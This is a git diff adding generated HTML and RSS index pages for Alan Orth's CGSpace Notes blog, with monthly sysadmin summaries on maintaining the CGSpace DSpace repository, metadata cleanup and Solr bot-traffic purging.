+
+
+</p>
+  </header>
+  <h2 id="2023-04-02">2023-04-02</h2>
+<ul>
+<li>Run all system updates on CGSpace and reboot it</li>
+<li>I exported CGSpace to CSV to check for any missing Initiative collection mappings
+<ul>
+<li>I also did a check for missing country/region mappings with csv-metadata-quality</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-03/">March, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-03-01T07:58:36+03:00">Wed Mar 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-03-01">2023-03-01</h2>
+<ul>
+<li>Remove <code>cg.subject.wle</code> and <code>cg.identifier.wletheme</code> from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)</li>
+<li><a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28">iso-codes 4.13.0 was released</a>, which incorporates my changes to the common names for Iran, Laos, and Syria</li>
+<li>I finally got through with porting the input form from DSpace 6 to DSpace 7</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-02/">February, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-02-01T10:57:36+03:00">Wed Feb 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-02-01">2023-02-01</h2>
+<ul>
+<li>Export CGSpace to cross check the DOI metadata with Crossref
+<ul>
+<li>I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&hellip;</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-01/">January, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-01-01T08:44:36+03:00">Sun Jan 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-01-01">2023-01-01</h2>
+<ul>
+<li>Apply some more ORCID identifiers to items on CGSpace using my <code>2022-09-22-add-orcids.csv</code> file
+<ul>
+<li>I want to update all ORCID names and refresh them in the database</li>
+<li>I see we have some new ones that aren&rsquo;t in our list if I combine with this file:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-12/">December, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-12-01T08:52:36+03:00">Thu Dec 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-12-01">2022-12-01</h2>
+<ul>
+<li>Fix some incorrect regions on CGSpace
+<ul>
+<li>I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions</li>
+</ul>
+</li>
+<li>Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!</li>
+<li>Replace &ldquo;East Asia&rdquo; with &ldquo;Eastern Asia&rdquo; region on CGSpace (UN M.49 region)</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-11/">November, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-11-01T09:11:36+03:00">Tue Nov 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-11-01">2022-11-01</h2>
+<ul>
+<li>Last night I re-synced DSpace 7 Test from CGSpace
+<ul>
+<li>I also updated all my local <code>7_x-dev</code> branches on the latest upstreams</li>
+</ul>
+</li>
+<li>I spent some time updating the authorizations in Alliance collections
+<ul>
+<li>I want to make sure they use groups instead of individuals where possible!</li>
+</ul>
+</li>
+<li>I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&rsquo;t upload CSVs from the web interface and is a very low severity security issue</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-10/">October, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-10-01T19:45:36+03:00">Sat Oct 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-10-01">2022-10-01</h2>
+<ul>
+<li>Start a harvest on AReS last night</li>
+<li>Yesterday I realized how to use <a href="https://im4java.sourceforge.net/docs/dev-guide.html">GraphicsMagick with im4java</a> and I want to re-visit some of my thumbnail tests
+<ul>
+<li>I&rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8</li>
+<li>I filed <a href="https://github.com/criteo/JVips/issues/141">an issue to ask about Java 11+ support</a></li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  
+  
+  <a class="btn btn-outline-primary disabled" href="#" role="button" aria-disabled="true">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/2/" rel="next" role="button">Next page</a>
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/notes/index.xml b/docs/categories/notes/index.xml
new file mode 100644
index 000000000..8ae193f7c
--- /dev/null
+++ b/docs/categories/notes/index.xml
@@ -0,0 +1,1490 @@
+<?xml version="1.0" encoding="utf-8" standalone="yes"?>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+  <channel>
+    <title>Notes on CGSpace Notes</title>
+    <link>https://alanorth.github.io/cgspace-notes/categories/notes/</link>
+    <description>Recent content in Notes on CGSpace Notes</description>
+    <generator>Hugo -- gohugo.io</generator>
+    <language>en-us</language>
+    <lastBuildDate>Sat, 01 Jul 2023 17:14:36 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" rel="self" type="application/rss+xml" />
+    <item>
+      <title>July, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-07/</link>
+      <pubDate>Sat, 01 Jul 2023 17:14:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-07/</guid>
+      <description>2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &amp;ldquo;Copyrighted; all rights reserved&amp;rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&amp;rsquo;s usually copyrighted (could still be open access, but we can&amp;rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&amp;hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&amp;rsquo;t like the Impact Area icons as a component because they don&amp;rsquo;t have any visual meaning </description>
+    </item>
+    
+    <item>
+      <title>June, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-06/</link>
+      <pubDate>Fri, 02 Jun 2023 10:29:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-06/</guid>
+      <description>&lt;h2 id=&#34;2023-06-02&#34;&gt;2023-06-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Spend some time testing my &lt;code&gt;post_bitstreams.py&lt;/code&gt; script to update thumbnails for items on CGSpace
+&lt;ul&gt;
+&lt;li&gt;Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
+&lt;ul&gt;
+&lt;li&gt;They have experience with improving the MODS interface in MELSpace&amp;rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace&lt;/li&gt;
+&lt;li&gt;From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-05/</link>
+      <pubDate>Wed, 03 May 2023 08:53:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-05/</guid>
+      <description>&lt;h2 id=&#34;2023-05-03&#34;&gt;2023-05-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Alliance&amp;rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace
+&lt;ul&gt;
+&lt;li&gt;It seems their password expired, which is annoying&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
+&lt;ul&gt;
+&lt;li&gt;There are many of our subjects that would match if they added a &amp;ldquo;-&amp;rdquo; like &amp;ldquo;high yielding varieties&amp;rdquo; or used singular&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Also I found at least two spelling mistakes, for example &amp;ldquo;decison support systems&amp;rdquo;, which would match if it was spelled correctly&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-04/</link>
+      <pubDate>Sun, 02 Apr 2023 08:19:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-04/</guid>
+      <description>&lt;h2 id=&#34;2023-04-02&#34;&gt;2023-04-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Run all system updates on CGSpace and reboot it&lt;/li&gt;
+&lt;li&gt;I exported CGSpace to CSV to check for any missing Initiative collection mappings
+&lt;ul&gt;
+&lt;li&gt;I also did a check for missing country/region mappings with csv-metadata-quality&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Start a harvest on AReS&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-03/</link>
+      <pubDate>Wed, 01 Mar 2023 07:58:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-03/</guid>
+      <description>&lt;h2 id=&#34;2023-03-01&#34;&gt;2023-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Remove &lt;code&gt;cg.subject.wle&lt;/code&gt; and &lt;code&gt;cg.identifier.wletheme&lt;/code&gt; from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28&#34;&gt;iso-codes 4.13.0 was released&lt;/a&gt;, which incorporates my changes to the common names for Iran, Laos, and Syria&lt;/li&gt;
+&lt;li&gt;I finally got through with porting the input form from DSpace 6 to DSpace 7&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-02/</link>
+      <pubDate>Wed, 01 Feb 2023 10:57:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-02/</guid>
+      <description>&lt;h2 id=&#34;2023-02-01&#34;&gt;2023-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export CGSpace to cross check the DOI metadata with Crossref
+&lt;ul&gt;
+&lt;li&gt;I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-01/</link>
+      <pubDate>Sun, 01 Jan 2023 08:44:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-01/</guid>
+      <description>&lt;h2 id=&#34;2023-01-01&#34;&gt;2023-01-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Apply some more ORCID identifiers to items on CGSpace using my &lt;code&gt;2022-09-22-add-orcids.csv&lt;/code&gt; file
+&lt;ul&gt;
+&lt;li&gt;I want to update all ORCID names and refresh them in the database&lt;/li&gt;
+&lt;li&gt;I see we have some new ones that aren&amp;rsquo;t in our list if I combine with this file:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-12/</link>
+      <pubDate>Thu, 01 Dec 2022 08:52:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-12/</guid>
+      <description>&lt;h2 id=&#34;2022-12-01&#34;&gt;2022-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Fix some incorrect regions on CGSpace
+&lt;ul&gt;
+&lt;li&gt;I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!&lt;/li&gt;
+&lt;li&gt;Replace &amp;ldquo;East Asia&amp;rdquo; with &amp;ldquo;Eastern Asia&amp;rdquo; region on CGSpace (UN M.49 region)&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-11/</link>
+      <pubDate>Tue, 01 Nov 2022 09:11:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-11/</guid>
+      <description>&lt;h2 id=&#34;2022-11-01&#34;&gt;2022-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Last night I re-synced DSpace 7 Test from CGSpace
+&lt;ul&gt;
+&lt;li&gt;I also updated all my local &lt;code&gt;7_x-dev&lt;/code&gt; branches on the latest upstreams&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I spent some time updating the authorizations in Alliance collections
+&lt;ul&gt;
+&lt;li&gt;I want to make sure they use groups instead of individuals where possible!&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&amp;rsquo;t upload CSVs from the web interface and is a very low severity security issue&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-10/</link>
+      <pubDate>Sat, 01 Oct 2022 19:45:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-10/</guid>
+      <description>&lt;h2 id=&#34;2022-10-01&#34;&gt;2022-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Start a harvest on AReS last night&lt;/li&gt;
+&lt;li&gt;Yesterday I realized how to use &lt;a href=&#34;https://im4java.sourceforge.net/docs/dev-guide.html&#34;&gt;GraphicsMagick with im4java&lt;/a&gt; and I want to re-visit some of my thumbnail tests
+&lt;ul&gt;
+&lt;li&gt;I&amp;rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8&lt;/li&gt;
+&lt;li&gt;I filed &lt;a href=&#34;https://github.com/criteo/JVips/issues/141&#34;&gt;an issue to ask about Java 11+ support&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-09/</link>
+      <pubDate>Thu, 01 Sep 2022 09:41:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-09/</guid>
+      <description>&lt;h2 id=&#34;2022-09-01&#34;&gt;2022-09-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;A bit of work on the &amp;ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&amp;rdquo; spreadsheet&lt;/li&gt;
+&lt;li&gt;I tested an item submission on DSpace Test with the Cocoon &lt;code&gt;org.apache.cocoon.uploads.autosave=false&lt;/code&gt; change
+&lt;ul&gt;
+&lt;li&gt;The submission works as expected&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Start debugging some region-related issues with csv-metadata-quality
+&lt;ul&gt;
+&lt;li&gt;I created a new test file &lt;code&gt;test-geography.csv&lt;/code&gt; with some different scenarios&lt;/li&gt;
+&lt;li&gt;I also fixed a few bugs and improved the region-matching logic&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-08/</link>
+      <pubDate>Mon, 01 Aug 2022 10:22:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-08/</guid>
+      <description>&lt;h2 id=&#34;2022-08-01&#34;&gt;2022-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Our request to add &lt;a href=&#34;https://github.com/spdx/license-list-XML/issues/1525&#34;&gt;CC-BY-3.0-IGO to SPDX&lt;/a&gt; was approved a few weeks ago&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-07/</link>
+      <pubDate>Sat, 02 Jul 2022 14:07:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-07/</guid>
+      <description>&lt;h2 id=&#34;2022-07-02&#34;&gt;2022-07-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I learned how to use the Levenshtein functions in PostgreSQL
+&lt;ul&gt;
+&lt;li&gt;The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing&lt;/li&gt;
+&lt;li&gt;Also, the trgm functions I&amp;rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-06/</link>
+      <pubDate>Mon, 06 Jun 2022 09:01:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-06/</guid>
+      <description>&lt;h2 id=&#34;2022-06-06&#34;&gt;2022-06-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Look at the Solr statistics on CGSpace
+&lt;ul&gt;
+&lt;li&gt;I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &amp;ldquo;msnbot-&amp;rdquo; using the Solr query &lt;code&gt;dns:*msnbot* AND dns:*.msn.com&lt;/code&gt;&lt;/li&gt;
+&lt;li&gt;I purged these first so I could see the other &amp;ldquo;real&amp;rdquo; IPs in the Solr facets&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent&lt;/li&gt;
+&lt;li&gt;I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent&lt;/li&gt;
+&lt;li&gt;I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
+&lt;ul&gt;
+&lt;li&gt;There seem to be many more of these:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-05/</link>
+      <pubDate>Wed, 04 May 2022 09:13:39 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-05/</guid>
+      <description>&lt;h2 id=&#34;2022-05-04&#34;&gt;2022-05-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
+&lt;ul&gt;
+&lt;li&gt;18.207.136.176&lt;/li&gt;
+&lt;li&gt;185.189.36.248&lt;/li&gt;
+&lt;li&gt;50.118.223.78&lt;/li&gt;
+&lt;li&gt;52.70.76.123&lt;/li&gt;
+&lt;li&gt;3.236.10.11&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Looking at the Solr statistics for 2022-04
+&lt;ul&gt;
+&lt;li&gt;52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests&lt;/li&gt;
+&lt;li&gt;64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc&lt;/li&gt;
+&lt;li&gt;185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt&lt;/li&gt;
+&lt;li&gt;157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&amp;rsquo;t know why its requests were logged in Solr&lt;/li&gt;
+&lt;li&gt;52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests&lt;/li&gt;
+&lt;li&gt;157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests&lt;/li&gt;
+&lt;li&gt;207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&amp;rsquo;t know why its requests were logged in Solr&lt;/li&gt;
+&lt;li&gt;If I query Solr for &lt;code&gt;time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.&lt;/code&gt; I see a handful of IPs that made 41,000 requests&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I purged 93,974 hits from these IPs using my &lt;code&gt;check-spider-ip-hits.sh&lt;/code&gt; script&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-04/</link>
+      <pubDate>Fri, 01 Apr 2022 10:53:39 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-04/</guid>
+      <description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
+    </item>
+    
+    <item>
+      <title>March, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
+      <pubDate>Tue, 01 Mar 2022 16:46:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-03/</guid>
+      <description>&lt;h2 id=&#34;2022-03-01&#34;&gt;2022-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Send Gaia the last batch of potential duplicates for items 701 to 980:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-02/</link>
+      <pubDate>Tue, 01 Feb 2022 14:06:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-02/</guid>
+      <description>&lt;h2 id=&#34;2022-02-01&#34;&gt;2022-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Meeting with Peter and Abenet about CGSpace in the One CGIAR
+&lt;ul&gt;
+&lt;li&gt;We agreed to buy $5,000 worth of credits from Atmire for future upgrades&lt;/li&gt;
+&lt;li&gt;We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization&lt;/li&gt;
+&lt;li&gt;We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one&lt;/li&gt;
+&lt;li&gt;We agreed to try to do more alignment of affiliations/funders with ROR&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-01/</link>
+      <pubDate>Sat, 01 Jan 2022 15:20:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-01/</guid>
+      <description>&lt;h2 id=&#34;2022-01-01&#34;&gt;2022-01-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Start a full harvest on AReS&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-12/</link>
+      <pubDate>Wed, 01 Dec 2021 16:07:07 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-12/</guid>
+      <description>&lt;h2 id=&#34;2021-12-01&#34;&gt;2021-12-01&lt;/h2&gt;
+&lt;ul&gt;
